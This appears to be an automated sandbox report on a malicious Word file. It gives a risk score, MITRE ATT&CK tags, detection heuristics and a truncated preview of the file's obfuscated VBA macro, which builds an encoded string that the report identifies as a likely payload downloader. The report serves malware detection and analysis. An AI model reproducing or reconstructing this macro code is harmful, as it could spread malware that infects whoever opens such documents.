MALICIOUS
82
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro. The macro's primary function appears to be constructing and executing a string, likely a command to download and run a second-stage payload. The constructed string is "He ll ( '25X71X91!126!0_83<88q74_16<82{95!87<88{94}73j29T115{88{73{19j106j88{95!126{81{84T88E83j73j6_25X77j77}100j0q26X85T73X73_77_7!18<18_74X74}74T". This behavior is indicative of a downloader or initial access mechanism.
Heuristics 4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11182 bytes |
SHA-256: a27c420761b04c40500d14f7b41789fff980fd712513529d25e73151893d6d5f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "QdITzZNNNA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "rZtivMUjWOuUm"
Function KWACFXA()
On Error Resume Next
nYIJB = (83882 / CBool(13470) + 98870 + CSng(cdFWKo) * (2595 - EIKZj + 85222 - CLng(RNCfob)))
PdGXR = CByte(76300 * Tan(46820) / 63546 + CLng(FYhZZk * 62571 * 26292 * Chr(70360)))
nVbNc = "He" + "ll" + " " + Chr(40) + "'2" + "5X71X91" + "!12" + "6!0" + "_8"
pvjHZG = CByte(78523 * Tan(39880) / 31705 + CLng(SfspiN * 44041 * 96294 * Chr(21647)))
UcIol = (14007 / CBool(61825) + 40818 + CSng(oobKKb) * (27484 - PmXNpX + 59284 - CLng(BwSNj)))
iOZLfOjJ = "3<" + "88" + "q74_16<8" + "2{" + "95" + "!87"
CYPOh = CByte(70879 * Tan(54401) / 38626 + CLng(EjHXLU * 71626 * 80438 * Chr(97572)))
QaNvi = (9820 / CBool(57480) + 70600 + CSng(INHLHz) * (61309 - DCHmuW + 73400 - CLng(JipZnb)))
RkzuSw = "<88{9" + "4}7" + "3j2" + "9T115{88" + "{73{19j1"
aEIYwD = CByte(88035 * Tan(20060) / 12540 + CLng(Gtotma * 60671 * 12472 * Chr(63937)))
TwDVVE = (52486 / CBool(99918) + 41532 + CSng(oLzhsE) * (75270 - kwtbhi + 67068 - CLng(OOkot)))
kiqmLt = "06j88" + "{95" + "!126{81" + "{84T88" + "E83j73j" + "6_" + "25X77j7" + "7}100j0" + "q26X85" + "T73X7" + "3_"
idHzua = CByte(28986 * Tan(32137) / 20952 + CLng(QiVtV * 50113 * 23311 * Chr(447)))
FAprOZ = (74048 / CBool(21171) + 79442 + CSng(Pjhok) * (86200 - TFkwa + 83757 - CLng(UoppY)))
WWDwdWDk = "77_7!18<" + "18_74X" + "74}" + "74T"
KWACFXA = nVbNc + iOZLfOjJ + RkzuSw + kiqmLt + WWDwdWDk
pjinWc = CByte(20295 * Tan(8801) / 30830 + CLng(itlpT * 92334 * 39145 * Chr(29802)))
tBMAz = (90955 / CBool(59062) + 17531 + CSng(WZjwmA) * (57888 - YhtJdI + 16252 - CLng(TPFznu)))
End Function
Function UnZOlR()
On Error Resume Next
iEtzji = CByte(27411 * Tan(88398) / 36264 + CLng(jYqFp * 33882 * 77445 * Chr(92060)))
BiGwQt = (7235 / CBool(39107) + 56981 + CSng(ZLsczu) * (30181 - NHJOc + 57121 - CLng(vOXqzT)))
bJOipIpvYn = "19_94_82" + "T77X" + "73<84!9"
iuvfia = CByte(60761 * Tan(13120) / 92388 + CLng(ctPmi * 5670 * 22903 * Chr(3716)))
nGIZm = (3309 / CBool(55380) + 11648 + CSng(ijddM) * (78105 - nizKhu + 37795 - CLng(AhEnmF)))
NfsYEU = "4{77}82" + "T7" + "7T8" + "8<19" + "{82{79_" + "90" + "E18E10<" + "83_126}1" + "09T10" + "8X79}18" + "T1" + "25"
slJENt = CByte(18608 * Tan(47861) / 73415 + CLng(HGBwQI * 58554 * 63905 * Chr(77410)))
BjokWt = (75161 / CBool(37267) + 47391 + CSng(zpTPh) * (95972 - ihKCIb + 6380 - CLng(FAECW)))
hnZsoWzYXG = "X85_73" + "}7" + "3{77<7!1" + "8{18<7"
OaKNt = CByte(66522 * Tan(21045) / 12623 + CLng(dHtIq * 8419 * 51349 * Chr(87830)))
UirbtH = (72309 / CBool(61785) + 32685 + CSng(iQCaEE) * (18374 - UEZJu + 37358 - CLng(BaEowW)))
THoOoobfzM = "4}88" + "}75j8" + "4T86}19" + "}85q" + "72X1" + "8q82X" + "92!89E86" + "!126E"
zzKbz = CByte(4985 * Tan(19576) / 57689 + CLng(zdVCT * 49264 * 52586 * Chr(72232)))
zTNkV = (20787 / CBool(69342) + 46211 + CSng(rjjrUW) * (21947 - bQrKa + 99725 - CLng(vwBBL)))
istKkK = "76!18" + "E125{8" + "5X73!73T" + "77_" + "7E18" + "E18X87}" + "92q86j88" + "}84}" + "83"
UnZOlR = bJOipIpvYn + NfsYEU + hnZsoWzYXG + THoOoobfzM + istKkK
KOiNR = CByte(39361 * Tan(80028) / 16886 + CLng(ZiKpfq * 90157 * 16781 * Chr(53551)))
WzncJC = (3017 / CBool(46817) + 38063 + CSng(oZJiNa) * (90156 - VQWTBY + 43706 - CLng(NoYjo)))
End Function
Function kcbIwT()
On Error Resume Next
wIvPpz = CByte(53622 * Tan(35026) / 5183 + CLng(zUNYv * 98734 * 41275 * Chr(32164)))
sFVQC = (91883 / CBool(28475) + 11184 + CSng(oMAmLU) * (28661 - DzJarN + 80131 - CLng(lqjrbT)))
sKpVMkj = "T90}" + "81_8" + "8j78j19" + "E94!82<" + "80j" + "18X1" + "06{14q" + "94!74_18" + "}125E85" + "{73T73" + "}7" + "7E7!18_"
NajcWd = CByte(20901 * Tan(90887) / 43773 + CLng(iKMXz * 61351 * 98906 * Chr(63797)))
qJSzAs = (61248 / CBool(36568) + 33880 + CSng(fORVj) * (7145 - PFZzcj + 12871 - CLng(usbYp)))
BKjarMc = "18}74E" + "74{74
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.